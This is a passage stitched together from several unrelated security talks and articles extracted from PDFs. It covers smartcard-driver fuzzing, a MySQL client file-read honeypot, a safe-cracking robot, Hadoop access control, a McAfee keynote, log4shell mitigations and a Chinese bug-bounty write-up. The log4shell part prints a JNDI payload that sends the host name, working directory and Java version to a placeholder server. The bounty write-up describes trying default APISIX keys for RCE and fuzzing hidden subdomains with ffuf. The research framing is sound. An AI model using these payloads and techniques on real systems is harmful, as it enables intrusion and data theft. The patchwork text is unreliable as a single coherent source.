RevocationCheck
CRL
GenerateNonce
SignRequestforNonce
Signature
CheckSignatureAgainstCerticate
DEF CON 2018
12 / 30
Trust the Smartcard
• Driver developers trust the
smartcard!
• Let’s abuse that
• Mess with the card responses
DEF CON 2018
13 / 30
# Bugs
Project
# Bugs
libykneomgr
1
OpenSC
Over 9000 ;-)
pam_pkcs11
1
smartcardservices
2
Yubico-Piv
2
No, I did not fuzz the &$#?@! out of it...
but guess which one I fuzzed the most ;-) Thanks to Frank Morgner for fixing!
DEF CON 2018
14 / 30
Apple Smartcardservices
do {
cacreturn = cacToken.exchangeAPDU(command, sizeof(command), result,
resultLength);
,!
if ((cacreturn & 0xFF00) != 0x6300)
CACError::check(cacreturn);
...
memcpy(certificate + certificateLength, result, resultLength - 2);
certificateLength += resultLength - 2;
// Number of bytes to fetch next time around is in the last byte
// returned.
command[4] = cacreturn & 0xFF;
} while ((cacreturn & 0xFF00) == 0x6300);
DEF CON 2018
15 / 30
OpenSC - CryptoFlex
u8 buf[2048], *p = buf;
size_t bufsize, keysize;
sc_format_path("I1012", &path);
r = sc_select_file(card, &path, &file);
if (r)
return 2;
bufsize = file->size;
sc_file_free(file);
r = sc_read_binary(card, 0, buf, bufsize, 0);
DEF CON 2018
16 / 30
Popping calcs...
DEF CON 2018
17 / 30
Basic Smartcard Exploitation in 2018
• Basiccard gives you nice control,...
yes BASIC!
• Example exploit (Kevin) will be
released to the public at beVX
• Other methods would be SIMtrace
or certain Javacards
DEF CON 2018
18 / 30
YUBICO PIV
if(*out_len + recv_len - 2 > max_out) {
fprintf(stderr,
"Output buffer to small, wanted to write %lu, max was %lu.",
*out_len + recv_len - 2, max_out);
,!
,!
}
if(out_data) {
memcpy(out_data, data, recv_len - 2);
out_data += recv_len - 2;
*out_len += recv_len - 2;
}
DEF CON 2018
19 / 30
Logging in...
DEF CON 2018
20 / 30
Challenges in fuzzing a protocol
• Most modern fuzzers are file-oriented
• Radamsa: Generates a corpus of files
• Hongfuzz: passes a file (filename different each run)
• libfuzzer: passes a buffer and length
• AFL: passes a file
DEF CON 2018
21 / 30
Challenges in fuzzing a protocol
• SCardTransmit() tells us how much data it expects
• Read this from a file on each call and error out if EOF
• No complicated poll handling like for network sockets required
DEF CON 2018
22 / 30
How to fuzz - OpenSC
• reader-fuzzy.c
• Implements a (virtual) smartcard
reader interface
• Responds with malicious data read
from file (OPENSC_FUZZ_FILE)
• Have fun with AFL
American
Fuzz Lop
pkcs11-tool -t
libopensc
card-cac.c
reader-fuzzy.c
Fuzzing
File
Input
DEF CON 2018
23 / 30
How to fuzz - Winscard and PC/SC
• Winscard(.dll) on Linux and Unix
• For proprietary code
• Preload the library
• Have fun with non-feedback fuzzers
(e.g. radamsa) or AFL in qemu
mode
DEF CON 2018
24 / 30
How to fuzz - Winscard 2
• Tavis loadlibrary
• Extended to support Winscard
drivers
• Fuzz the windows drivers on linux
without all the overhead
DEF CON 2018
25 / 30
Smartcard fuzzing
• Released now!
• https://github.com/x41sec/x41-
smartcard-fuzzing
DEF CON 2018
26 / 30
pam_pkcs11: Replay an Authentication
PAM
Smartcard
CRLServer
GetCerticates
Certicate
Validate Certicate and User
RevocationCheck
CRL
RequestRandomNonce
Nonce
SignRequestforNonce
Signature
CheckSignatureAgainstCerticate
DEF CON 2018
27 / 30
Roadblocks
• Channel back to card is quite limited
• Might need to use revocation list check for information leaks
• Interaction during exploitation not possible with basiccard, get SIMtrace for
that
• But: A single bitflip from false to true during login can be enough :)
DEF CON 2018
28 / 30
Takeaways / Conclusions
• Think about trust models!
• Some security measures increase your attack surface big time!
• Fuzz Everything!
• Limit attack surface by disabling certain drivers.
• Do not write drivers in C ;-)
DEF CON 2018
29 / 30
Thanks
• Q & A
• https://github.com/x41sec/x41-smartcard-
fuzzing
• [email protected]
• Sorry no Twitter... stalk me on LinkedIn if
you must ;-)
https://www.x41-dsec.de/
30 / 30 | pdf |
MySQL高交互反制蜜罐实践
0x00 背景
MySQL客户端任意文件读取“漏洞”由来已久,近年来由于护网的兴起,基于该漏洞的MySQL反制蜜罐
也频繁出现。然而很多商业蜜罐都是基于一些开源的验证性脚本进行开发(见参考链接),以这个完成
度来钓红队简直是在侮辱红队的智商。那么MySQL反制蜜罐从PoC到工程化实践中要解决哪些坑呢?咱
们今天来一一介绍。
0x01 PoC的局限
MySQL读文件漏洞的原理网上有一大把分析文章,这里就不再赘述了。先来简单看一个典型的PoC
的执行流程,如下图。客户端登录后向服务端发送查询请求之后,服务端返回了读文件的响应,客户端
乖乖就范,把文件发给了服务端。此时一般情况下服务端应该返回一个 OK_PACKET 作为响应,当然客户
端收到 OK_PACKET 之后会打印一串类似 Query OK, 0 rows affected (0.00 sec) 的文本出来。我一
个select语句,你给我返回 0 rows affected 无论如何是说不过去的,所以这里直接断开连接,假装成一
个服务不太稳定的MySQL。
看到这里相信你已经看出来了,这个PoC每次查询只能读取一个文件,而且读完之后会断开连接,
犹如掩耳盗铃。这两个限制导致很多MySQL反制蜜罐沦为红队智商检测器,在实战中几乎发挥不出作
用。那么我们如何解除这两个限制呢?答案还得从MySQL协议说起。
0x02 一次读多个文件
MySQL协议中详细描述了一次查询请求( COM_QUERY ,增删改查等都属于查询请求)的执行流程,
如下图:
对于 COM_QUERY ,服务端可能有四种响应
表格数据;
ERR_PACKET( 0xFF ,客户端收到后会打印 ERROR 1064 (42000): blabla.... );
OK_PACKET( 0x00 , 客户端收到后会打印 Query OK, 0 rows affected (0.00 sec)
blabla... );
需要本地文件( 0xFB ,客户端收到后会发送对应的文件)。
对于 0xFB 响应,客户端发送完本地数据之后,服务端需要响应 ERR_PACKET 或者 OK_PACKET 来
表明数据处理成功或者处理出错。这里协议没有写清楚的是,如果此时服务端发送的不是 OK/ERR 而是
一个表格数据响应甚至是 0xFB 读文件响应,客户端要如何处理呢?简单验证一下可以看到,客户端仍
然把它当作一个正常的响应,进行数据展示或者发送文件。这样的话事情一下子就有意思了起来,我们
稍微优化一下前面的PoC执行流程,如下图:
服务端在接收到文件之后可以立即再发送一个 0xFB 读文件响应,如此反复一次查询就可以读完所有所
需文件,最后再发送一个表格数据的响应作为结束,让客户端展示,以此来掩盖中间的执行流程。
0x02 高交互
前面提到服务端在接收到文件以后可以返回一个表格数据响应,客户端会展示这个表格。那么如何构
造这个表格才能伪装地更像一个真实地MySQL服务呢?答案就是把SQL查询代理到真正的MySQL服务!
参考HTTP 代理的思路,我们可以实现这样一个MySQL代理:
非查询请求(握手、登录等),直接转发到服务器处理;
拦截查询请求,并发送读文件响应(可循环多次读取);
文件读取结束后,再转发对应的请求到真正的MySQL服务处理。
这样一个高交互、高隐匿、可反制的MySQL蜜罐基本架构就出来了
0x04 其他小细节与最终demo
当然实际写代码肯定不会跟画图一样简单,实现过程中还有很多小问题要考虑:
1. 拦截请求时MySQL协议中请求编号的处理;
2. SSL加密请求的处理,MySQL高版本默认开启了SSL加密,可以手动关闭或者在代理上替换掉证
书;
3. 可以在MySQL握手阶段修改一些标志位,让客户端发送客户端版本、操作系统、本机用户名之类的
信息;
4. 读文件时如果读到不存在的文件,客户端不会继续处理接下来的 OK_PACKET 和表格数据,而且会
打印一个文件不存在的报错,但是可以用一个 ERR_PACKET ,配合一个合适的报错信息(比如错误
代码1040, Too many connections)来掩盖这个报错。
最后,综合以上所有要素,我用GoLang写了一个简单的demo出来,执行效果如图,源码可以私信我获
取~
0x05 红队如何防范
经过不同版本MySQL客户端与链接库的测试对比,最后发现:JDBC在很古老的版本就已经解决这个问
题了,MySQL和MariaDB在新版本(MySQL 8.0、Mariadb 10.3.1x)也解决了这个问题。然而Navicat
最新版现在仍然在使用libmariadb 10.1.46.0,受该问题影响。所以,不要用Navicat!它会让你变得不
幸。
0xFF 参考链接
[1] MysqlHoneypot
[2] Rogue MySql Server
[3] Hfish 中的 MySQL 蜜罐
[4] MySQL蜜罐获取攻击者微信ID
[5] CSS-T | Mysql Client 任意文件读取攻击链拓展
[6] MySQL 协议(COM_QUERY)
[7] MySQL 协议 (MySQL Packet)
[8] MySQL协议(Error Codes) | pdf |
Nathan Seidle
Joel Bartlett
Rob Reynolds
Combos in 45
minutes or less!*
*Totes Guaranteed
2002
Credit: Me
Credit: Benjamin Rasmussen
Credit: Make Magazine
Credit: SparkFun
Credit: SparkFun
Credit: xkcd
Credit: SentrySafe / Liberty Safes
Power!
Motor with 8400
tick encoder
Servo with
feedback
Arduino
Handle puller
Magnets
Erector set
(Actobotics)
Power!
Motor with 8400
tick encoder
Servo with
feedback
Arduino
Handle puller
Magnets
Erector set
(Actobotics)
Credit: Pololu
Power!
Motor with 8400
tick encoder
Servo with
feedback
Arduino
Handle puller
Magnets
Erector set
(Actobotics)
The super freaking amazing
nautilus gear that made this all
work
‘Come back here’
spring
Standard servo with analog
feedback hack
Very fancy string
Go! Btn
Servo and
feedback
Motor Driver
Beep!
Current Sensor
Motor control
and feedback
Display
RedBoard =
Arduino
12V External
Hard Drive
Power Supply
‘Home’ Photogate
Problem Domain:
1003 combinations
10 seconds per test
115 days (worst case)
Exploits
Combinations:
1003 combinations
Exploits
Combinations:
1003 combinations
333 combinations = 4.15 days
Exploits
Exploits
Combinations:
1003 combinations
333 combinations = 4.15 days
Disc C has 12 indents
332 * 12 = 1.5 days
Exploits
Disc C:
Outer diameter: 2.815” (71.5mm)
Width of solution slot: 0.239”
Width of 11 indents: 0.249” +/- 0.002”
8.84” (Circumference) / 8400 ticks
0.001” / tick
~10 ticks smaller
Exploits
Combinations:
1003 combinations
333 combinations = 4.15 days
Disc C has 12 indents
332 * 12 = 1.5 days
Disc C has a skinny indent
332 * 1 = 3 hours
X
Exploits
‘New’ Disc C:
Outer diameter: 2.456” (62.4mm)
Width of solution slot: 0.250”
Width of 11 indents: 0.201” +/- 0.002”
7.72” (Circumference) / 8400 ticks
0.00092” / tick
~54 ticks LARGER
(5 times easier to hack)
‘New’ Disc C:
Outer diameter: 2.456” (62.4mm)
Width of solution slot: 0.250”
Width of 11 indents: 0.201” +/- 0.002”
7.72” (Circumference) / 8400 ticks
0.00092” / tick
~54 ticks LARGER
(5 times easier to hack)
‘New’ Disc C:
Outer diameter: 2.456” (62.4mm)
Width of solution slot: 0.250”
Width of 11 indents: 0.201” +/- 0.002”
7.72” (Circumference) / 8400 ticks
0.00092” / tick
~54 ticks LARGER
(5 times easier to hack)
‘New’ Disc C:
Outer diameter: 2.456” (62.4mm)
Width of solution slot: 0.250”
Width of 11 indents: 0.201” +/- 0.002”
7.72” (Circumference) / 8400 ticks
0.00092” / tick
~54 ticks LARGER
(5 times easier to hack)
Exploits
Combinations:
1003 combinations
333 combinations = 4.15 days
Disc C has 12 indents
332 * 12 = 1.5 days
Disc C has a large indent
332 * 1 = 3 hours
Exploits
Test Time:
Resetting Dials = 10s / test
Exploits
Test Time:
Resetting Dials = 10s / test
‘Set testing’ = 4s / test
1.2 hours
Exploits Luck
Test Time:
Resetting Dials = 10s / test
‘Set testing’ = 4s / test
1.2 hours
45 minutes!
How do I protect
myself!?
Credit: Pixabay.com
Credit: starwarsblog.starwars.com
One of these is not like the others...
“The S&G 6730 ... has only a +/- .5 dialing
tolerance, essentially giving a 1 digit window to
hit. While many locksmiths might prefer the S&G
6730, it can be notoriously difficult to open and
very unforgiving to human error. In addition, slight
alterations to the lock (for example, if the dial or
the dial ring was bumped during shipping) can
shift the combination, rendering the lock
unusable.”
-Hayman Safes: Lock Ratings
“The S&G 6730 ... has only a +/- .5 dialing
tolerance, essentially giving a 1 digit window to
hit. While many locksmiths might prefer the S&G
6730, it can be notoriously difficult to open and
very unforgiving to human error. In addition, slight
alterations to the lock (for example, if the dial or
the dial ring was bumped during shipping) can
shift the combination, rendering the lock
unusable.”
-Hayman Safes: Lock Ratings
Future Research
Future Research
Future Research
Credit: iRobot
Future Research
Is it open yet?
[email protected]
Demo fail! | pdf |
Cloud Security in Map/Reduce
An Analysis
July 31, 2009
Jason Schlesinger
[email protected]
Presentation Overview
Contents:
1. Define Cloud Computing
2. Introduce and Describe Map/Reduce
3. Introduce Hadoop
4. Introduce Security Issues with Hadoop
5. Discuss Possible Solutions and Workarounds
6. Final Thoughts
Goals:
Raise awareness of Hadoop and its potential
Raise awareness of existing security issues in
Hadoop
Inspire present and future Hadoop users and
administrators to be aware of security in their
Hadoop installation
Defining Cloud Computing
Distributed across multiple machines that are linked
together either through the Internet, or across an internal
network
Fault tolerant to hardware failure, which is inevitable to
happen in a large cluster scenario
Applications are abstracted from the OS (more or less)
Often used to offload tasks from user systems that would be
unreasonable to run, or unfavorable to maintain.
Considering the above:
Hadoop is an incarnation of Map/Reduce in a Cloud
environment.
Map/Reduce: What It Is
Map/Reduce is for huge data sets that have to
be indexed, categorized, sorted, culled, analyzed,
etc. It can take a very long time to look through
each record or file in a serial
environment. Map/Reduce allows data to be
distributed across a large cluster, and can
distribute out tasks across the data set to work on
pieces of it independantly, and in parallel. This
allows big data to be processed in relatively little
time.
Funfact: Google implemented and uses a proprietary
Map/Reduce platform. Apache has produced
an open source Map/Reduce platform called Hadoop
Laundromat analogy of Map/Reduce
Imagine that your data is laundry. You wash this laundry
by similar colors. Then you dry this laundry by similar
material (denims, towels, panties, etc.)
Serial
Operation:
You now have clean laundry!
(Time Elapsed: 2-3 hrs)
Laundromat analogy of Map/Reduce
Map/Reduce operation:
You now have clean laundry!
(Time elapsed: 1.25 hrs.)
Word Count example of Map/Reduce
Other Potential uses of Map/Reduce
Since it takes a large data set, breaks it down into smaller data
sets, here are some potential uses:
indexing large data sets in a database
image recognition in large images
processing geographic information system (GIS) data -
combining vector data w/ point data (Kerr, 2009)
analyzing unstructured data
analyzing stock data
Machine learning tasks
Any situation where processing a data set would be impractical
due to its size.
Map/Reduce is a little more confusing...
Source: (Dean & Ghemawat, 2004)
Hadoop - A Brief Overview
Developed by Apache as an open source distributed
Map/Reduce platform, based off of Google's MapReduce as
described in Dean and Ghemawat, 2004.
Runs on a Java architecture
Hadoop allows businesses to process large amounts of data
quickly by distributing the work across several nodes.
One of the leaders of open source implementations of
Map/Reduce.
Good for very large data sets and on large clusters.
Growing as a business and research tool
Hadoop - A Key Business Tool
Used by Large Content-Distribution Companies, such as...
Yahoo! - Recently released their version of Hadoop
Hadoop is used for many of their tasks, and over 25,000
computers are running Hadoop. (PoweredBy, 2009)
A9
Hadoop is good for Amazon, they have lots of product data,
as well as user-generated content to index, and make
searchable. (PoweredBy, 2009)
New York Times
Hadoop is used to perform large-scale image conversions of
public domain articles. (Gottfrid, 2007)
Veoh
Hadoop is used to "reduce usage data for internal metrics, for
search indexing and for recommendation data." (PoweredBy,
2009)
Hadoop - Why I Care (and so can you!)
Used by non-content-distribution companies, such as
Facebook
eHarmony
Rackspace ISP
Other early adopters include anyone with big data:
medical records
tax records
network traffic
large quantities of data
Wherever there is a lot of data, a Hadoop cluster can generally
process it relatively quickly.
Security Framework and Access
Control
Now that we know that Hadoop is increasingly useful, here are
the security issues with it:
Hadoop holds data in HDFS - Hadoop Distributed File
System. The file system as of version 0.19.1 has no read
control, all jobs are run as 'hadoop' user, and the file system
doesn't follow access control lists.
The client identifies the user running a job by the output of
the 'whoami' command - which can be forged (Kerr, 2009)
HBase (BigTable for Hadoop) as of ver. 0.19.3 lacks critical
access control measures. No read or write control.
The LAMP analogue, any application can access any
database by simply making a request for it.
Implications of this Accusation
Any business running a Hadoop cluster gives all
programmers and users the same level of trust to all the
data that goes into the cluster.
Any job running on a Hadoop cluster can access any data
on that cluster.
Any user with limited access to the jobs they can run, can
potentially run that job on any data set on the cluster.
Pause for Demonstration
(Or similar substitue.)
Possible Workarounds
Keep each data set on its own Hadoop Cluster
If attackers can only access data they have rights to,
then the point is moot
It is possible to run each job in its own cluster on
Amazon Web Services with the Elastic MapReduce
service, which sits on the Elastic Cloud Computing
platform. Simply upload your data to Amazon, give it a
job, tell it how many nodes to use, and run it.
Hadoop on Demand - load data into a real cluster, and
generate a virtual cluster every time a job is run.
Possible Workarounds
Don't store any confidential, secret, private data in Hadoop
No one cares if the group that's indexing the forum data
can access the knowledge base data (actually, we wish
they would more often)
Encrypt all your sensitive data
This will make it difficult to analyze sensitive fields
Sensitive data is not always defined as such, and may
leak into ustructured fields (such as comments sections)
Adds overhead of moving data that most jobs won't read.
Possible Solution
Develop a Solution that sits on the file system, or write a
concerned email to Hadoop developers
The problem is that access control is held at the client
level, when it should be at the file system level.
Access control list checks should be performed at the
start of any read or write.
User authentication should use a more secure method,
such as a password or RSA key authentication.
Final Thoughts
Hadoop is a rising technology, not quite mature, and still has
plenty of its own issues. However it's starting to take hold in
the marketplace, and now is the time to quell bigger issues like
this.
We have the power to shape the future today, let us learn from
the mistakes of the past.
Bibliography
Dean, J., & Ghemawat, S. MapReduce: Simplified Data Processing on Large Clusters
(2004). Google, Inc..
Gottfrid, D., 2007. Self Service, Prorated, Super Computing Fun. Retrieved 6 29, 2009,
from http://open.blogs.nytimes.com/2007/11/01/self-service-prorated-super-computing-fun/
Hadoop 19.1 API, 2009. Hadoop Documentation. Apache Software Foundation. Retrieved
3 10, 2009, from http://hadoop.apache.org/core/docs/r0.19.1/api/
Hadoop Map/Reduce Tutorial, 2009. Apache Software Foundation. Retrieved 3 10, 2009,
from http://hadoop.apache.org/core/docs/r0.19.1/mapred_tutorial.html
Powered By, 2009. Apache Software Foundation. Retrieved 3 10, 2009, from http://wiki.
apache.org/hadoop/PoweredBy
Kerr, N., 2009. http://nathankerr.com/ | pdf |
COPYRIGHT ©2006 McAfee Inc.
» What’s Next?
Hacks-In-Taiwan 2006 Keynote
Yen-Ming Chen
Senior Principal Consultant
Foundstone, A Division of McAfee
2
COPYRIGHT ©2006 McAfee Inc.
Agenda
»
Introduction
»
Security Ecosystem
»
Security Trends
»
Security Technology
»
Conclusion
3
COPYRIGHT ©2006 McAfee Inc.
Introduction
Yen-Ming Chen
»
Sr. Principal Consultant
»
Been to 12 countries, 7 offices
and 6 years with Foundstone
»
Contributing author of four
security books and numerous
published articles.
»
Master of Science in
Information Networking from
C.M.U.
»
Provide security risk
assessment from web
applications to emerging
technologies
4
COPYRIGHT ©2006 McAfee Inc.
Security EcoSystem
Government
Corporate/Organization
The Bad Guys
General Public
Attack
Attack
Attack
Sell Products
Sell Products
Regulate
Catch
5
COPYRIGHT ©2006 McAfee Inc.
A Chronology of
Data Breaches
Reported Since
the ChoicePoint
Incident (Feb,
2005)
Unfortunately I
am one of the
innocent victim
too!
6
COPYRIGHT ©2006 McAfee Inc.
Security Trend – The Problem
7
COPYRIGHT ©2006 McAfee Inc.
Vulnerability-to-worm cycle is shrinking…
288
104
205
88
26
0
50
100
150
200
250
300
350
1999
2000
2001
2002
2003
Days
8
COPYRIGHT ©2006 McAfee Inc.
The sophistication of attacks is rising…
The sophistication of attacks is rising…
9
COPYRIGHT ©2006 McAfee Inc.
Internet security has come a long way…
Internet
Nirvana
Internet
Centric
Internet
Enabled
Internet
Aware
Internet
Isolated
Firewalls
Antivirus
Consolidate
authorization
Outsourcing
grunt work
Enterprise
Vulnerability
Management
Systems
Risk
Management
Dashboard
Application
security
Security
resource
dashboard
Intrusion
detection
Vulnerability
assessment
Gartner “Managing the Risks of IT Security” September 2002
• Internet “Darwinism” = Survival of the Fittest
• From Reactive to Proactive
• From Assessing to Managing
10
COPYRIGHT ©2006 McAfee Inc.
Security Technology
Firewalls
IDS
VM/Risk Management
Secure Coding /
Secure Architecture
Secure OS
Vulnerability
Assessment
SSO
PKI
VPN
Today
IPS
1996
1998
2002
20??
2006
Adoption
11
COPYRIGHT ©2006 McAfee Inc.
(Re-) Establish Security Team
Initiate Strategic
Program
Institute Processes
Conclude Catch-Up
Projects
Track Technology and
Business Change
Continuous
Process
Improvement
Maturity
time
NOTE: Population distributions represent typical, large G2000-type organizations
15%
15%
5%
5%
Review Status Quo
50%
50%
30%
30%
Develop New
Policy Set
Design
Architecture
Information Security Maturity: 2004
Awareness
Phase
Corrective
Phase
Blissful
Ignorance
Operations
Excellence Phase
12
COPYRIGHT ©2006 McAfee Inc.
http://www.acsac.org/2004/dist.html
Microsoft’s Software Security Enlightenment
13
COPYRIGHT ©2006 McAfee Inc.
Here is another perspective
Source: http://www.avertlabs.com/research/blog/?p=53
14
COPYRIGHT ©2006 McAfee Inc.
In fact, almost every security technology
depends on vulnerabilities…
Discovering and managing vulnerabilities
Vulnerability Mgmt
Fixing vulnerabilities
Patch/Systems Mgmt
Hackers viewing vulnerable, cleartext files
Encryption
Hackers taking advantage of vulnerable passwords, few controls
Authentication/Authorization
Vulnerability inherent in online identities.
Identity Mgmt
Vulnerabilities in software, end-user usage.
Anti-virus
Ensuring compliance to prevent attacks on vulnerabilities
Policy Management
Detecting hackers exploiting vulnerabilities
NIDS/HIDS
Addressing the data overflow issue caused by vulnerabilities
Event Correlation
Detecting and preventing hackers exploiting vulnerabilities
NIPS/HIPS
Blocking attackers taking advantage of vulnerabilities
Firewalls/VPN
Role in vulnerabilities?
Technology
15
COPYRIGHT ©2006 McAfee Inc.
Disruptive or Sustaining?
»
Disruptive Innovation
–
Introducing new dimensions of performance compared to existing
innovations
–
Creates new markets or offer more convenience or lower prices to
customers
»
Sustaining Innovation
–
Introducing improved performance compared to existing products and
services
16
COPYRIGHT ©2006 McAfee Inc.
Firewall as an Example
Sustaining Innovation
Low-End Disruption
New Market Disruption
Time
Time
Performance
Performance
Firewall
IPS
Software Firewall?
Firewall + VPN
Personal Firewall
Personal Internet Security Suite
Company improvement trajectory
Customer demand trajectory
Firewall with different spec
Nonconsumer
17
COPYRIGHT ©2006 McAfee Inc.
What’s Next?
»
Security Integration
–
Make security as part of your business
–
Make security as part of your daily operation
–
Make security as part of your life
»
Fundamental problems:
–
Trust
–
Balance
18
COPYRIGHT ©2006 McAfee Inc.
Security Integration
»
Events happening in the industry:
–
Corporate M&A
• 3Com/Cisco buying security companies
• Symantec + Veritas
• EMC + RSA
–
Company expands into security
• Microsoft
– SDL, Anti-Virus, integrate security into SMS and MOM
• Verizon, Nortel and other service provider, telecoms
– start providing security consulting services
»
Security-only companies in the long run?
–
Attack competitor’s credibility
–
0-days to keep advantage
19
COPYRIGHT ©2006 McAfee Inc.
Security Integration – RPV Analysis
»
Resource
–
Non-security companies have resources in
• Product development skills
• Cash
• Channels and customers
»
Process
–
Market research
–
Resource allocation
»
Value
–
Provide security on top of existing product
• Add-Value to existing customer
• Easier to be accepted
20
COPYRIGHT ©2006 McAfee Inc.
Trust and Balance
»
Abusing trust relationship
–
Attackers are shifting between targets
• Network -> Server -> (Web) Application -> Browser
–
Researchers are seeking solutions
• Firewall -> Vulnerability Scan -> Trusted Computing Platform -> SDL
»
Balance
–
Password policies that don’t make business sense
–
Unplug the network to keep it secure?!#$^
–
Security testing should be part of QA process
21
COPYRIGHT ©2006 McAfee Inc.
Conclusion
»
Security will never die; But it won’t be effective until fully integrated into
business
–
Don’t expect silver bullet or “easy button” because there is none!
–
Automation is a paradigm shift; Necessary evil; Hard problem too!
»
Fundamental problems need to be solved
–
‘Trust’ and ‘Balance’
»
Expand your horizon
–
Need to understand the technology, and innovation to know where you are
going to next!
COPYRIGHT ©2006 McAfee Inc.
» Question & Answer
Thank You!
Yen-Ming Chen
[email protected] | pdf |
玩转攻击检测
ID: tang3
⽤用机器学习
绿盟科技
申军利
WHOAMI
•
ID:tang3
•
绿盟科技安全研究员
•
WEB🐶——Java Web相关、
PHP代码审计、渗透攻防技术
研究
•
机器学习围观⼈人员
•
健⾝身爱好&研究者
•
棋臭瘾⼤大围棋渣
⺫⽬目的:思路分享
思路、⼼心得、实践
常⻅见机器学习⽅方向
• 预测
• 分类
• 聚类
机器学习是
将现实问题转换为数学问题求解的过程
思考步骤
• 确认待解决问题是哪⼀一类的问题
• 先正则后机器学习(量→质)
没⾜足够数量级的样本说个P
思考步骤
• 确认待解决问题是哪⼀一类的问题分类
• 先正则后机器学习(量→质)
• 特征量如何数字化(数据预处理)
数据的预处理——
将数据内容转化为可以计算的模样
思考步骤
• 确认待解决问题是哪⼀一类的问题分类
• 先正则后机器学习(量→质)
• 特征量如何数字化(数据预处理)
• 选择最适合的算法
• 初期效果不错后再对算法进⾏行进⼀一步完善
机器学习不是万灵药,它也有适合不适合的场景
实战环节
攻击检测引擎的实现
• 正常与攻击的⼆二分类问题(逻辑回归?)
• 攻击语句按照类型可以很容易得到⼤大量样本
• 特征量是什么?怎么数字化?
问题思考
-1 and union select password
from admin —+
垃圾邮件分类器
朴素⻉贝叶斯算法
(Naive Bayes, NB 算法)
• 正常与攻击的⼆二分类问题(逻辑回归?)
• 攻击语句按照类型可以很容易得到⼤大量样本
• 特征量是什么?怎么数字化?
词与词的
关系
统计!
问题思考
• 正常与攻击的⼆二分类问题(逻辑回归?)
• 攻击语句按照类型可以很容易得到⼤大量样本
• 特征量是什么?怎么数字化?
• 算法:朴素⻉贝叶斯
问题思考
• D为整个⽂文本,h+/h-分别代表攻击和⾮非攻击,W1
代表D中的第⼀一个单词
• P(h+|D) = P(h+)*P(D|h+)/P(D)
• P(h-|D) = P(h-)*P(D|h-)/P(D)
• P(h+|D)<>P(h-|D)
公式推演
• 使⽤用朴素⻉贝叶斯来简化计算
P(D|h+)=P(W1|h+)*P(W2|h+)*P(W3|h+)…
P(D|h-)=P(W1|h-)*P(W2|h-)*P(W3|h-)…
公式实际应⽤用
• -1 union select 1,123,2 —+
• p(-1 union select 1,123,2 --+|h+) = p(-1|h+) ·
p(union|h+) · p(select|h+) · p(1|h+) · …
使⽤用统计
• ⼤大数定理
• 1000个攻击相关的单词,union出现了10次,那
P(union)=0.01
数据预处理
——
每种攻击⼀一套
分词
单个切词性能很好,但*10?
⼀一种攻击⼀一个切词,⼯工作量?
数据预处理——通⽤用分词
• 攻击语句均有代码特征,抽象代码特性进⾏行分词
(可⾏行)
• 保证性能消耗不会因为攻击类型的增多⽽而线性增
⻓长(值得)
实现之后与正则检测
有什么不⼀一样?
不需编写任何代码规则便可完成建模
更新规则只需添加新语料到规则库
⽐比正则引擎快上⼗十多倍的检测效率
对算法进⾏行交叉验证:误报率6%,漏报率0.66%
吸星数据来⾃自K折线⽅方法的评估
其他数据来⾃自⻓长亭PPT
0
20
40
60
80
吸星
SQLChop
⼚厂商A
⼚厂商B
⼚厂商C
libinjection
漏报率
误报率
⼲⼴广 告
我们做的这个攻击检测引擎叫做吸星
吸星
Star Track
http://startra.nsfocus.com
发现漏、误报可以联系:
[email protected]
⼀一些问题
概率是失控的,也是公平的
通⽤用切词如果发⽣生修改就是:
牵⼀一发,⽽而动全⾝身
每种攻击(语⾔言?)都有⾃自⼰己个
性的⼀一⾯面
WTF
@eval//kjkjkjk
($_GET//
[//kjkjkj
'c'//kjkioewuorwuo
]//kjlsjlkjljlkj
);
@eval($_GET[‘c’]);
⼀一些猜想
• 单词的统计+其他分类机器学习(逻辑回归)?
• 这种思路在⽇日志审计甚⾄至代码审计中能否使⽤用?
道阻且⻓长
路漫漫其修远兮,吾将上下⽽而求索 | pdf |
log4shell
0x00
log4shell
anyway
0x01
waf
rasp
1. wafrasphidssoc
2. rasp
log4j
0x02
1. nolookupstrue
2. key
3. jdkrce
1nolookups
nolookupstruelookup
log4jXMLlookup
log.error("${sys:java.version}"+"xxxxx") lookup
java version
lookup
1.
2. lookup
3.
lookupGitHub
2
1. jvm -Dlog4j2.formatMsgNoLookups=true
2. classpathlog4j2.component.propertieslog4j2.formatMsgNoLookups=True
3. FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS true
1. 2.10
2. key
LOG4J_log4j2_formatMsgNoLookups=True
3jdk
jdkdnslogjdk
gadgetspringboot
https://mp.weixin.qq.com/s/vAE89A5wKrc-YnvTr0qaNg
0x03
nolookupsfalselookuprc1
nolookupstrue
1. rc1rc2nolookupstrue
2. jndifalse
3. lookup
lookup
jndilookupnolookups=false
log4j2jndilookuplookupjndi
0x04
${jndi:dns://xxx.xxx.xxx.xxx:port/${hostName} -${sys:user.dir}- ${sys:java.version} - ${java:os}}
vpsudp
RCE | pdf |
0x01 前⾔
如有技术交流或渗透测试/代码审计/SRC漏洞挖掘/红队⽅向综合培训 或 红蓝对抗评估/安全产品研发/安全服务需
求的朋友
欢迎联系QQ/VX 547006660
https://github.com/J0o1ey/BountyHunterInChina
重⽣之我是赏⾦猎⼈系列,欢迎⼤家点个star
0x02 缘起
早上打开微信⽆聊⽔群,偶然间发现新上了家SRC
新上的SRC⼀般都是细⽪嫩⾁的处⼦,未经万⼈骑,得⼿也更加容易,我们来⼀探究竟
0x03 资产搜集到默认秘钥被改 ⼭穷⽔尽
简单⽤⽬标的cert信息收集了⼀下⽹络空间的资产
发现了⽬标不少的域名都采⽤“短横线命名法”,⼀般来说⼤⼚⽤这种命名法便于分辨开发、测试、⽣产环境还是蛮
多的
Wri t t en by J 0o1ey: 547006660
总结了⼀下,常⻅的开发、测试、⽣产环境域名中常⻅词如下
随后从资产列表中找到了⼀个看起来像管理api接⼝的域名进⾏访问
根据⻚⾯回显,结合之前多年的测试经验,推断此处使⽤了Apache Apisix
之前复现过Apache Apisix默认秘钥添加恶意路由导致的RCE漏洞,此处直接准备⼀试
发现直接寄了,⽬标⽣产环境的api把这个默认的key给改掉了,导致没法创建恶意路由
uat
test
dev
pre
pr
pro
...
Wri t t en by J 0o1ey: 547006660
难道就这样结束了?那显然不符合我们的⻛格
0x04 理顺思路-发现隐藏的测试环境资产
刚刚我们在进⾏资产搜集时,已经发现了⽬标域名的统⼀命名特点
那么我们完全可以借助FUZZ域名来搞出⼀点⽕花,尝试发掘隐藏资产
最终成功发现按照⽬标的⽬标的四处⾮⽣产环境的隐藏资产
./ffuf -w domain_test -u https://gateway-xxx-xxx-FUZZ.xxx.com -mc 404 -t 1
